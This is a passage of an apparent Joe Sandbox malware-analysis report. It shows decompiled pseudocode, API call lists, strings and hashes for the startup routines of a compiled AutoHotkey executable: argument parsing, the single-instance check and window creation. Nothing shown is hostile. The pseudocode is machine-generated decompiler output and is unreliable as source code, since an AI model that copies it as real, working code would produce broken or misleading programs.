				_v88 = 0;
				_v80 = 0;
				_v94 = 0;
				_v92 = 1;
				_v84 = _t87;
				if(_t87 <= 1) {
					L48:
					_t232 =  &_v93;
					_t89 = E0042C600(0x4d8728, "0", 0,  &_v76, 3, _t232);
					if(_t89 != 0) {
						L50:
						if( *((char*)(_t89 + 0x17)) != 0) {
							_t256 = _t89;
						} else {
							_t256 =  *((intOrPtr*)(_t89 + 0xc));
						}
						_t90 =  *(_t256 + 0x15);
						if((_t90 & 0x00000002) != 0) {
							 *(_t256 + 0x15) = _t90 & 0x0000003d;
							_t145 =  *_t256;
							_t232 =  *((intOrPtr*)( *_t145 + 8));
							 *_t232(_t145);
						}
						asm("cdq");
						 *_t256 = _v92 - 1;
						_t95 =  *(_t256 + 0x15) & 0x0000009b | 0x00000018;
						 *((intOrPtr*)(_t256 + 4)) = _t232;
						 *(_t256 + 0x15) = _t95;
						if(_t95 >= 0) {
							__eflags =  *0x4d785c;
							if( *0x4d785c == 0) {
								L59:
								__eflags =  *0x4d7860;
								if( *0x4d7860 != 0) {
									__eflags = _t95 & 0x00000020;
									if((_t95 & 0x00000020) != 0) {
										goto L61;
									}
								}
							} else {
								__eflags = _t95 & 0x00000010;
								if((_t95 & 0x00000010) != 0) {
									L61:
									__eflags = _t95 & 0x00000008;
									if((_t95 & 0x00000008) != 0) {
										L00401160(_t256, _t314);
									}
								} else {
									goto L59;
								}
							}
						} else {
							L00401160(_t256, _t314);
							 *(_t256 + 0x15) =  *(_t256 + 0x15) & 0x0000008f;
						}
						_t97 = E0042C600(0x4d8728, L"A_Args", 6,  &_v92, 0xc1,  &_v94);
						if(_t97 == 0) {
							_push((0 | _v94 != 0x00000000) + 0x00000001 | 0x000000c0);
							_push(_v92);
							_push(L"A_Args");
							_push(0x4d8728);
							_t97 = E0042C8B0(6, _t314);
						}
						_t257 = _t97;
						if(_t97 == 0) {
							goto L32;
						} else {
							_t206 =  *0x4d540c; // 0x3211b88
							_t195 =  *0x4d5404; // 0x1
							_t233 = _t206 + _v84 * 4;
							_t100 = E00477660(_t195 - _v84, _t206, _t206 + _v84 * 4);
							_t278 = _t277 + 4;
							if(_t100 == 0) {
								goto L32;
							} else {
								E00481B10(_t257, _t100, _t314);
								E00403D80(_t233);
								_push(_v88);
								_push(_v80);
								_t197 = 0x4d8728;
								if(E0041D470(0x4d8728, _t314) != 1) {
									goto L32;
								} else {
									_t259 =  *0x4d3b04; // 0x3215110
									memcpy(0x4d6340, _t259, 0x42 << 2);
									_t279 = _t278 + 0xc;
									_t251 = _t259 + 0x84;
									_t211 = 0x4d8728;
									_t106 = E0041E610(0x4d8728, _t314);
									if(_t106 != 0xffffffff) {
										__eflags = _t106;
										if(_t106 != 0) {
											_t107 =  *0x4d7850;
											__eflags = _t107;
											if(_t107 != 0) {
												__eflags = _t107 - 4;
												if(_t107 == 4) {
													goto L88;
												} else {
													goto L81;
												}
											} else {
												_t233 =  *0x4d4d2c; // 0x4d7f54
												__eflags =  *_t233 - _t107;
												if( *_t233 != _t107) {
													L79:
													 *0x4d7850 = 1;
													L81:
													__eflags = _v96;
													if(_v96 != 0) {
														goto L89;
													} else {
														__eflags =  *0x4d771b;
														if( *0x4d771b != 0) {
															goto L98;
														} else {
															_t133 =  *0x4d9204; // 0x17a0188
															_t251 = FindWindowW(L"AutoHotkey", _t133);
															__eflags = _t251;
															if(_t251 == 0) {
																goto L98;
															} else {
																_t135 =  *0x4d7850;
																__eflags = _t135 - 3;
																if(_t135 == 3) {
																	goto L72;
																} else {
																	__eflags = _t135 - 2;
																	if(_t135 == 2) {
																		L87:
																		_t128 = 0x407;
																		goto L91;
																	} else {
																		asm("fldz");
																		_t211 =  *0x4d91f8; // 0x17a0174
																		_t284 = _t279 - 8;
																		 *_t284 = _t314;
																		_push(0);
																		_push(_t211);
																		_push(4);
																		_push(L"An older instance of this script is already running.  Replace it with this instance?\nNote: To avoid this message, see #SingleInstance in the help file.");
																		_t137 = L00483420(_t211, _t314);
																		_t279 = _t284 + 0x18;
																		__eflags = _t137 - 7;
																		if(_t137 == 7) {
																			goto L72;
																		} else {
																			goto L87;
																		}
																	}
																}
															}
														}
													}
												} else {
													__eflags =  *0x4d7f70 - _t107;
													if( *0x4d7f70 != _t107) {
														goto L79;
													} else {
														__eflags =  *0x4d7828 - _t107;
														if( *0x4d7828 != _t107) {
															goto L79;
														} else {
															__eflags =  *0x4d782c - _t107;
															if( *0x4d782c != _t107) {
																goto L79;
															} else {
																__eflags =  *0x4d7836 - _t107;
																if( *0x4d7836 == _t107) {
																	L88:
																	__eflags = _v96;
																	if(_v96 == 0) {
																		L98:
																		_t260 = SystemParametersInfoW;
																		_t108 = SystemParametersInfoW(0x2000, 0, 0x4d6234, 0);
																		__eflags = _t108;
																		if(_t108 != 0) {
																			__eflags =  *0x4d6234;
																			if( *0x4d6234 != 0) {
																				SystemParametersInfoW(0x2001, 0, 0, 2);
																			}
																		}
																		__eflags = E0041D7F0(0x4d8728, _t314) - 1;
																		if(__eflags != 0) {
																			goto L32;
																		} else {
																			_push(0);
																			_push(4);
																			_push(0);
																			_push(E00498E2A() + 0x20);
																			E00498D34(_t197, _t233, _t251, _t260, __eflags);
																			_t261 =  *0x4d3a10; // 0x28
																			__eflags = _t261;
																			if(_t261 != 0) {
																				_t264 = _t261 * 0xd4;
																				_t124 = E0049853E(_t233, _t251, _t261 * 0xd4, _t261 * 0xd4);
																				 *0x4d7f10 = _t124;
																				__eflags = _t124;
																				if(_t124 != 0) {
																					E004A2D60(_t124, 0, _t264);
																				}
																			}
																			__eflags =  *0x4d93d2;
																			if( *0x4d93d2 == 0) {
																				_v84 = 8;
																				_v80 = 0x1ff;
																				__imp__InitCommonControlsEx( &_v84);
																			}
																			_t234 =  *0x4d4d0c; // 0x0
																			__eflags = _t234;
																			if(_t234 != 0) {
																				__eflags =  *(_t234 + 8);
																				if( *(_t234 + 8) != 0) {
																					_t118 =  *0x4d4d18; // 0x0
																					__eflags = _t118;
																					if(_t118 == 0) {
																						L111:
																						_t213 = 0x4af0b4;
																					} else {
																						_t122 =  *_t118;
																						_t213 = _t122;
																						__eflags = _t122;
																						if(_t122 == 0) {
																							goto L111;
																						}
																					}
																					_t119 =  *_t234;
																					__eflags = _t119;
																					if(_t119 == 0) {
																						_t119 = 0x4af0b4;
																					}
																					_push(_t213);
																					_push(_t119);
																					_t120 = E004085EE(_t213, _t314);
																					__eflags = _t120;
																					if(_t120 == 0) {
																						E00405ED2(0x4d8690, _t314);
																					}
																				}
																			}
																			E0040F020(_t314);
																			 *0x4d9208 = 1;
																			 *0x4d7efe = 0;
																			_t115 = E0042C5A0(0x4d8728, _t314, L"Clipboard", 0, 3);
																			__eflags = _t115;
																			if(_t115 != 0) {
																				E00403F50(_t115); // executed
																			}
																			_t116 = E004048F0(); // executed
																			return _t116;
																		}
																	} else {
																		L89:
																		_t233 =  *0x4d9204; // 0x17a0188
																		_t251 = FindWindowW(L"AutoHotkey", _t233);
																		__eflags = _t251;
																		if(_t251 == 0) {
																			goto L98;
																		} else {
																			_t128 = 0x406;
																			L91:
																			PostMessageW(_t251, 0x44, _t128, 0);
																			_t197 = Sleep;
																			_t265 = 0;
																			Sleep(0x14);
																			_t130 = IsWindow(_t251);
																			__eflags = _t130;
																			if(_t130 == 0) {
																				L97:
																				Sleep(0x64);
																				goto L98;
																			} else {
																				do {
																					__eflags = _t265 - 0x64;
																					if(_t265 != 0x64) {
																						goto L96;
																					} else {
																						asm("fldz");
																						_t283 = _t279 - 8;
																						 *_t283 = _t314;
																						_push(0);
																						_push(0);
																						_push(4);
																						_push(L"Could not close the previous instance of this script.  Keep waiting?");
																						_t132 = L00483420(_t211, _t314);
																						_t279 = _t283 + 0x18;
																						__eflags = _t132 - 7;
																						if(_t132 == 7) {
																							goto L32;
																						} else {
																							_t265 = 0;
																							__eflags = 0;
																							goto L96;
																						}
																					}
																					goto L119;
																					L96:
																					_t265 =  &(_t265->i);
																					Sleep(0x14);
																					_t131 = IsWindow(_t251);
																					__eflags = _t131;
																				} while (_t131 != 0);
																				goto L97;
																			}
																		}
																	}
																} else {
																	goto L79;
																}
															}
														}
													}
												}
											}
										} else {
											L72:
											__eflags = 0;
											return 0;
										}
									} else {
										_t267 =  *0x4d9210; // 0x0
										if(_t267 == 0) {
											goto L32;
										} else {
											E00403FA0();
											return 2;
										}
									}
								}
							}
						}
					} else {
						_t232 = _v76;
						_push((0 | _v93 != 0x00000000) + 1);
						_push(_t232);
						_push("0");
						_push(0x4d8728);
						_t89 = E0042C8B0(0, _t314);
						if(_t89 == 0) {
							goto L32;
						} else {
							goto L50;
						}
					}
				} else {
					do {
						_t220 =  *0x4d540c; // 0x3211b88
						_t269 =  *(_t220 + _t193 * 4);
						if(_v94 == 0) {
							_t147 = E00498079(_t246, _t269, L"/R");
							_t277 = _t277 + 8;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								_v88 = 1;
								goto L47;
							} else {
								_t154 = E00498079(_t246, _t269, L"/restart");
								_t277 = _t277 + 8;
								__eflags = _t154;
								if(_t154 == 0) {
									goto L46;
								} else {
									_t155 = E00498079(_t246, _t269, L"/F");
									_t277 = _t277 + 8;
									__eflags = _t155;
									if(_t155 == 0) {
										L45:
										 *0x4d771b = 1;
										goto L47;
									} else {
										_t156 = E00498079(_t246, _t269, L"/force");
										_t277 = _t277 + 8;
										__eflags = _t156;
										if(_t156 == 0) {
											goto L45;
										} else {
											_t157 = E004987FA(_t269, L"/ErrorStdOut", 0xc);
											_t277 = _t277 + 0xc;
											__eflags = _t157;
											if(_t157 != 0) {
												_t158 = E00498079(_t246, _t269, L"/iLib");
												_t285 = _t277 + 8;
												__eflags = _t158;
												if(_t158 != 0) {
													_t159 = E004987FA(_t269, L"/CP", 3);
													_t277 = _t285 + 0xc;
													__eflags = _t159;
													if(__eflags != 0) {
														__eflags =  *0x4d86a0 - 0xffffffff;
														if( *0x4d86a0 != 0xffffffff) {
															L44:
															_t34 = _t193 + 1; // 0x2
															_v94 = 1;
															_v80 = _t269;
															_v84 = _t34;
														} else {
															_t160 = E004987FA(_t269, L"/Debug", 6);
															_t277 = _t277 + 0xc;
															__eflags = _t160;
															if(_t160 != 0) {
																goto L44;
															} else {
																_t161 =  *(_t269 + 0xc) & 0x0000ffff;
																__eflags = _t161;
																if(_t161 == 0) {
																	L39:
																	__eflags = _t161 - 0x3d;
																	if(_t161 != 0x3d) {
																		_push(0x4d4d08);
																		E004049D0("localhost");
																		_push(0x4d4d14);
																		E004049D0("9000");
																	} else {
																		_t270 = _t269 + 0xe;
																		_t246 = E00498D06(_t269 + 0xe, 0x3a);
																		_t286 = _t277 + 8;
																		__eflags = _t246;
																		if(_t246 == 0) {
																			E0047BB00(0x4d4d08, _t270, 0xffffffff);
																			_t277 = _t286 + 8;
																			_push(0x4d4d14);
																			E004049D0("9000");
																		} else {
																			E0047BB00(0x4d4d08, _t270, _t166 - _t270 >> 1);
																			E0047BB00(0x4d4d14, _t246, 0xffffffff);
																			_t277 = _t286 + 0x10;
																		}
																	}
																} else {
																	__eflags = _t161 - 0x3d;
																	if(_t161 != 0x3d) {
																		goto L44;
																	} else {
																		goto L39;
																	}
																}
															}
														}
													} else {
														 *0x4d76f0 = E00403F00(_t269 + 6, __eflags);
													}
													goto L47;
												} else {
													_t193 = _t193 + 1;
													__eflags = _t193 -  *0x4d5404; // 0x1
													if(__eflags >= 0) {
														goto L32;
													} else {
														_push(0x38);
														_t178 = E00498C86(_t246, _t269, __eflags);
														_t277 = _t285 + 4;
														__eflags = _t178;
														if(_t178 == 0) {
															_t222 = 0;
															__eflags = 0;
														} else {
															_t222 = E00404040(_t178);
														}
														_t241 =  *0x4d540c; // 0x3211b88
														 *0x4d9210 = _t222;
														_t180 = E0047C1C0(0xfde9, _t222,  *((intOrPtr*)(_t241 + _t193 * 4)), 0x15);
														__eflags = _t180;
														if(_t180 != 0) {
															goto L47;
														} else {
															goto L32;
														}
													}
												}
											} else {
												__eflags =  *((short*)(_t269 + 0x18)) - 0x3d;
												if( *((short*)(_t269 + 0x18)) != 0x3d) {
													_t273 = 0;
													__eflags = 0;
												} else {
													_t273 = _t269 + 0x1a;
												}
												 *0x4d920b = 1;
												 *0x4d920c = E0041CC50(_t273);
												goto L47;
											}
										}
									}
								}
							}
						} else {
							_t149 = E00498B83(_v92,  &_v68, L"%d", _v92);
							_t277 = _t277 + 0xc;
							_t246 = _t149;
							if(_v68 == 0) {
								L32:
								return 2;
							} else {
								_t151 = E0042C600(0x4d8728,  &_v68, _t246,  &_v76, 3,  &_v93);
								if(_t151 != 0) {
									L16:
									_push(1);
									_push(0);
									_push(0xffffffff);
									_push(_t269);
									_push(_t151);
									L004817E0(_t314);
									_v112 = _v112 + 1;
									goto L47;
								} else {
									_push((0 | _v93 != 0x00000000) + 1);
									_push(_v76);
									_push( &_v68);
									_push(0x4d8728);
									_t151 = E0042C8B0(_t246, _t314);
									if(_t151 == 0) {
										goto L32;
									} else {
										goto L16;
									}
								}
							}
						}
						goto L119;
						L47:
						_t193 = _t193 + 1;
						_t298 = _t193 -  *0x4d5404; // 0x1
					} while (_t298 < 0);
					goto L48;
				}
				L119:
			}

0x00404150
0x00404159
0x0040415e
0x00404164
0x00404169
0x00404171
0x00404179
0x0040417e
0x00404185
0x004041f7
0x004041f7
0x00404187
0x00404187
0x00404189
0x0040418f
0x00000000
0x00404197
0x00404197
0x00404197
0x004041a0
0x004041a0
0x004041a3
0x004041a9
0x00000000
0x004041ab
0x004041af
0x004041b1
0x004041bc
0x004041c0
0x004041da
0x004041dc
0x004041e5
0x004041ea
0x004041ea
0x004041ef
0x004041f3
0x004041c2
0x004041c6
0x004041c7
0x004041d1
0x004041d6
0x004041d6
0x004041c0
0x004041a9
0x0040418f
0x004041fc
0x00404201
0x00404206
0x0040420b
0x00404210
0x00404218
0x0040421d
0x00404225
0x0040422b
0x004044cb
0x004044cb
0x004044e3
0x004044ea
0x00404515
0x00404519
0x00404520
0x0040451b
0x0040451b
0x0040451b
0x00404522
0x00404527
0x0040452b
0x0040452e
0x00404532
0x00404536
0x00404536
0x0040453d
0x0040453e
0x00404545
0x00404547
0x0040454a
0x0040454d
0x0040455c
0x00404563
0x00404569
0x00404569
0x00404570
0x00404572
0x00404574
0x00000000
0x00000000
0x00404574
0x00404565
0x00404565
0x00404567
0x00404576
0x00404576
0x00404578
0x0040457c
0x0040457c
0x00000000
0x00000000
0x00000000
0x00404567
0x0040454f
0x00404551
0x00404556
0x00404556
0x0040459c
0x004045a3
0x004045be
0x004045bf
0x004045c0
0x004045c5
0x004045ca
0x004045ca
0x004045cf
0x004045d3
0x00000000
0x004045d9
0x004045dd
0x004045e3
0x004045e9
0x004045ef
0x004045f4
0x004045f9
0x00000000
0x004045ff
0x00404603
0x00404608
0x00404615
0x00404616
0x00404617
0x00404624
0x00000000
0x0040462a
0x0040462a
0x0040463a
0x0040463a
0x0040463a
0x0040463c
0x0040463e
0x00404646
0x00404669
0x0040466b
0x00404678
0x0040467d
0x0040467f
0x004046bc
0x004046bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00404681
0x00404681
0x00404687
0x0040468a
0x004046b0
0x004046b0
0x004046c1
0x004046c1
0x004046c6
0x00000000
0x004046c8
0x004046c8
0x004046cf
0x00000000
0x004046d5
0x004046d5
0x004046e6
0x004046e8
0x004046ea
0x00000000
0x004046f0
0x004046f0
0x004046f5
0x004046f8
0x00000000
0x004046fe
0x004046fe
0x00404701
0x0040472c
0x0040472c
0x00000000
0x00404703
0x00404703
0x00404705
0x0040470b
0x0040470e
0x00404711
0x00404713
0x00404714
0x00404716
0x0040471b
0x00404720
0x00404723
0x00404726
0x00000000
0x00000000
0x00000000
0x00000000
0x00404726
0x00404701
0x004046f8
0x004046ea
0x004046cf
0x0040468c
0x0040468c
0x00404692
0x00000000
0x00404694
0x00404694
0x0040469a
0x00000000
0x0040469c
0x0040469c
0x004046a2
0x00000000
0x004046a4
0x004046a4
0x004046aa
0x00404733
0x00404733
0x00404738
0x004047bf
0x004047bf
0x004047d3
0x004047d5
0x004047d7
0x004047d9
0x004047e0
0x004047ed
0x004047ed
0x004047e0
0x004047f9
0x004047fc
0x00000000
0x00404802
0x00404802
0x00404804
0x00404806
0x00404810
0x00404811
0x00404816
0x0040481f
0x00404821
0x00404823
0x0040482a
0x00404832
0x00404837
0x00404839
0x0040483f
0x00404844
0x00404839
0x00404847
0x0040484e
0x00404855
0x0040485d
0x00404865
0x00404865
0x0040486b
0x00404871
0x00404873
0x00404875
0x00404879
0x0040487b
0x00404880
0x00404882
0x0040488c
0x0040488c
0x00404884
0x00404884
0x00404886
0x00404888
0x0040488a
0x00000000
0x00000000
0x0040488a
0x00404891
0x00404893
0x00404895
0x00404897
0x00404897
0x0040489c
0x0040489d
0x0040489e
0x004048a3
0x004048a5
0x004048ac
0x004048ac
0x004048a5
0x00404879
0x004048b1
0x004048c4
0x004048cb
0x004048d2
0x004048d7
0x004048d9
0x004048db
0x004048db
0x004048e0
0x004048eb
0x004048eb
0x0040473e
0x0040473e
0x0040473e
0x00404750
0x00404752
0x00404754
0x00000000
0x00404756
0x00404756
0x0040475b
0x00404761
0x00404767
0x0040476f
0x00404771
0x00404774
0x0040477a
0x0040477c
0x004047bb
0x004047bd
0x00000000
0x00404780
0x00404780
0x00404780
0x00404783
0x00000000
0x00404785
0x00404785
0x00404787
0x0040478a
0x0040478d
0x0040478f
0x00404791
0x00404793
0x00404798
0x0040479d
0x004047a0
0x004047a3
0x00000000
0x004047a9
0x004047a9
0x004047a9
0x00000000
0x004047a9
0x004047a3
0x00000000
0x004047ab
0x004047ad
0x004047ae
0x004047b1
0x004047b7
0x004047b7
0x00000000
0x00404780
0x0040477c
0x00404754
0x00000000
0x00000000
0x00000000
0x004046aa
0x004046a2
0x0040469a
0x00404692
0x0040468a
0x0040466d
0x0040466d
0x0040466d
0x00404675
0x00404675
0x00404648
0x00404648
0x00404650
0x00000000
0x00404656
0x00404656
0x00404666
0x00404666
0x00404650
0x00404646
0x00404624
0x004045f9
0x004044ec
0x004044ec
0x004044fa
0x004044fb
0x004044fc
0x00404501
0x00404508
0x0040450f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040450f
0x00404231
0x00404231
0x00404236
0x0040423c
0x0040423f
0x004042cf
0x004042d4
0x004042d7
0x004042d9
0x004044b9
0x004044b9
0x00000000
0x004042df
0x004042e5
0x004042ea
0x004042ed
0x004042ef
0x00000000
0x004042f5
0x004042fb
0x00404300
0x00404303
0x00404305
0x004044b0
0x004044b0
0x00000000
0x0040430b
0x00404311
0x00404316
0x00404319
0x0040431b
0x00000000
0x00404321
0x00404329
0x0040432e
0x00404331
0x00404333
0x00404361
0x00404366
0x00404369
0x0040436b
0x004043ca
0x004043cf
0x004043d2
0x004043d4
0x004043e8
0x004043ef
0x0040449e
0x0040449e
0x004044a1
0x004044a6
0x004044aa
0x004043f5
0x004043fd
0x00404402
0x00404405
0x00404407
0x00000000
0x0040440d
0x0040440d
0x00404411
0x00404414
0x0040441f
0x0040441f
0x00404422
0x0040447e
0x00404488
0x0040448d
0x00404497
0x00404424
0x00404424
0x0040442f
0x00404431
0x00404434
0x00404436
0x00404465
0x0040446a
0x0040446d
0x00404477
0x00404438
0x00404443
0x00404453
0x00404458
0x00404458
0x00404436
0x00404416
0x00404416
0x00404419
0x00000000
0x00000000
0x00000000
0x00000000
0x00404419
0x00404414
0x00404407
0x004043d6
0x004043de
0x004043de
0x00000000
0x0040436d
0x0040436d
0x0040436e
0x00404374
0x00000000
0x00404376
0x00404376
0x00404378
0x0040437d
0x00404380
0x00404382
0x0040438f
0x0040438f
0x00404384
0x0040438b
0x0040438b
0x00404391
0x00404397
0x004043a7
0x004043ac
0x004043ae
0x00000000
0x00000000
0x00000000
0x00000000
0x004043ae
0x00404374
0x00404335
0x00404335
0x0040433a
0x00404341
0x00404341
0x0040433c
0x0040433c
0x0040433c
0x00404345
0x00404351
0x00000000
0x00404351
0x00404333
0x0040431b
0x00404305
0x004042ef
0x00404245
0x00404254
0x00404259
0x00404262
0x00404264
0x004043b4
0x004043bf
0x0040426a
0x00404281
0x00404288
0x004042b3
0x004042b3
0x004042b5
0x004042b7
0x004042b9
0x004042ba
0x004042bb
0x004042c0
0x00000000
0x0040428a
0x0040429c
0x0040429d
0x0040429e
0x0040429f
0x004042a6
0x004042ad
0x00000000
0x00000000
0x00000000
0x00000000
0x004042ad
0x00404288
0x00404264
0x00000000
0x004044be
0x004044be
0x004044bf
0x004044bf
0x00000000
0x00404231
0x00000000

APIs

InitializeCriticalSection.KERNEL32(004D65E8), ref: 00404169
SetErrorMode.KERNEL32(00000001), ref: 00404171

Part of subcall function 0044AD70: GetCurrentDirectoryW.KERNEL32(00008000,?,?,0040417E), ref: 0044AD87

__wcsicoll.LIBCMT ref: 004042CF
__wcsicoll.LIBCMT ref: 004042E5
__wcsicoll.LIBCMT ref: 004042FB
__wcsicoll.LIBCMT ref: 00404311
__wcsnicmp.LIBCMT ref: 00404329
__wcsicoll.LIBCMT ref: 00404361
__wcsnicmp.LIBCMT ref: 004043CA
__wcsnicmp.LIBCMT ref: 004043FD
_wcsrchr.LIBCMT ref: 0040442A
FindWindowW.USER32(AutoHotkey,017A0188), ref: 004046E0
FindWindowW.USER32(AutoHotkey,017A0188), ref: 0040474A
PostMessageW.USER32(00000000,00000044,00000406,00000000), ref: 00404761
Sleep.KERNEL32(00000014), ref: 00404771
IsWindow.USER32(00000000), ref: 00404774
Sleep.KERNEL32(00000014), ref: 004047AE
IsWindow.USER32(00000000), ref: 004047B1
Sleep.KERNEL32(00000064), ref: 004047BD
SystemParametersInfoW.USER32 ref: 004047D3
SystemParametersInfoW.USER32 ref: 004047ED
_setvbuf.LIBCMT ref: 00404811
_malloc.LIBCMT ref: 0040482A
_memset.LIBCMT ref: 0040483F
InitCommonControlsEx.COMCTL32 ref: 00404865

Strings

/ErrorStdOut, xrefs: 00404323
@cM, xrefs: 00404635
/force, xrefs: 0040430B
A_Args, xrefs: 00404592, 004045C0
Out of memory., xrefs: 004041C7
An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta, xrefs: 00404716
/iLib, xrefs: 0040435B
/CP, xrefs: 004043C4
Clipboard, xrefs: 004048BA
localhost, xrefs: 00404483
Could not close the previous instance of this script. Keep waiting?, xrefs: 00404793
/Debug, xrefs: 004043F7
/restart, xrefs: 004042DF
9000, xrefs: 00404472, 00404492
AutoHotkey, xrefs: 004046DB, 00404745

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$Window$Sleep__wcsnicmp$FindInfoParametersSystem$CommonControlsCriticalCurrentDirectoryErrorInitInitializeMessageModePostSection_malloc_memset_setvbuf_wcsrchr
String ID: /CP$/Debug$/ErrorStdOut$/force$/iLib$/restart$9000$@cM$A_Args$An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$Clipboard$Could not close the previous instance of this script. Keep waiting?$Out of memory.$localhost
API String ID: 1826560011-1994657819
Opcode ID: 9721c7dade297c291b1761bf9527f9f3cb4276e0dbff8d692cc71c48814b6108
Instruction ID: bcd9d1683c603e65e372c6682ffa30271c47dadf0065143f1497cc8438a4fa5a
Opcode Fuzzy Hash: 9721c7dade297c291b1761bf9527f9f3cb4276e0dbff8d692cc71c48814b6108
Instruction Fuzzy Hash: 6C12F4B1B042006AD720AB699C45B6B37D49BD6708F14453FFA41A73C1EB7CDD4187AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7F0, Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 240
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0041D81C

Part of subcall function 00480460: LoadLibraryExW.KERNEL32(?,00000000,00000002,004D6340,004D8728,?,004D8728,00000000,FFFFFF61,00000000,00000000,00000000,004D6340,745FA180,004D8728), ref: 00480479
Part of subcall function 00480460: FindResourceW.KERNEL32(?,?,0000000E), ref: 004804DF
Part of subcall function 00480460: LoadResource.KERNEL32(?,00000000), ref: 004804EF
Part of subcall function 00480460: LockResource.KERNEL32(00000000), ref: 004804FE
Part of subcall function 00480460: GetSystemMetrics.USER32 ref: 00480526
Part of subcall function 00480460: FindResourceW.KERNEL32(?,?,00000003), ref: 00480586
Part of subcall function 00480460: LoadResource.KERNEL32(?,00000000), ref: 00480594
Part of subcall function 00480460: LockResource.KERNEL32(00000000), ref: 0048059F

GetSystemMetrics.USER32 ref: 0041D866

Part of subcall function 00480460: EnumResourceNamesW.KERNEL32 ref: 004804C6
Part of subcall function 00480460: SizeofResource.KERNEL32(?,00000000,00000001,00030000,00000000,00000000,00000000), ref: 004805BA
Part of subcall function 00480460: CreateIconFromResourceEx.USER32 ref: 004805C2
Part of subcall function 00480460: ExtractIconW.SHELL32(00000000,?,?), ref: 00480602

LoadCursorW.USER32(00000000,00007F00), ref: 0041D896
RegisterClassExW.USER32 ref: 0041D8BB
RegisterClassExW.USER32 ref: 0041D901
GetForegroundWindow.USER32 ref: 0041D908
GetClassNameW.USER32 ref: 0041D91A
__wcsicoll.LIBCMT ref: 0041D92E
CreateWindowExW.USER32 ref: 0041D985
CreateWindowExW.USER32 ref: 0041D9DC
GetDC.USER32(00000000), ref: 0041D9E8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DA21
MulDiv.KERNEL32(0000000A,00000000), ref: 0041DA2A
CreateFontW.GDI32(00000000), ref: 0041DA33
ReleaseDC.USER32 ref: 0041DA46
SendMessageW.USER32(?,00000030,?,00000000), ref: 0041DA63
SendMessageW.USER32(?,000000C5,00000000,00000000), ref: 0041DA75
ShowWindow.USER32(?,00000000), ref: 0041DA85
ShowWindow.USER32(?,00000000), ref: 0041DA90
ShowWindow.USER32(?,00000006), ref: 0041DA9F
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0041DAAB
LoadAcceleratorsW.USER32 ref: 0041DABD

Part of subcall function 0041DBC0: _memset.LIBCMT ref: 0041DBD0
Part of subcall function 0041DBC0: _wcsncpy.LIBCMT ref: 0041DC42
Part of subcall function 0041DBC0: Shell_NotifyIconW.SHELL32(00000000,004D89A2), ref: 0041DC55

Strings

Consolas, xrefs: 0041D9F7
pJ, xrefs: 0041D83F
Lucida Console, xrefs: 0041D9FE, 0041DA03
edit, xrefs: 0041D9D5
Shell_TrayWnd, xrefs: 0041D928
CreateWindow, xrefs: 0041D9A1
RegClass, xrefs: 0041D8D3
AutoHotkey, xrefs: 0041D97A
0, xrefs: 0041D837

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Resource$Window$Load$Create$ClassIconShow$FindLockMessageMetricsRegisterSendSystem_memset$AcceleratorsCapsCursorDeviceEnumExtractFontForegroundFromLibraryLongNameNamesNotifyReleaseShell_Sizeof__wcsicoll_wcsncpy
String ID: 0$AutoHotkey$Consolas$CreateWindow$Lucida Console$RegClass$Shell_TrayWnd$edit$pJ
API String ID: 2294752942-1813082230
Opcode ID: ce84e8b25d97995134bb79443dbd13fb4a0b71e8fe13267b38cb9f88f0b43b5d
Instruction ID: 264ce056df1253c2735db1ca3bcace7c5d3b5ca8ae76d018524b05eae3189702
Opcode Fuzzy Hash: ce84e8b25d97995134bb79443dbd13fb4a0b71e8fe13267b38cb9f88f0b43b5d
Instruction Fuzzy Hash: F071E8B1B843007BE760EB68DC46F5777A8AB45B14F10452BF600A72D0E7B9E444CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D470, Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00000000,00000106,00000000,00000000,?,00404621,?,?), ref: 0041D4A4
_wcsrchr.LIBCMT ref: 0041D4C6
_wcsrchr.LIBCMT ref: 0041D4D7
GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041D506
GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?), ref: 0041D57D
GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?), ref: 0041D5A4
__snwprintf.LIBCMT ref: 0041D5C2
GetFullPathNameW.KERNEL32(?,00008000,?,00000000,00000000,00000000,?,00404621,?,?), ref: 0041D609
_wcsrchr.LIBCMT ref: 0041D688
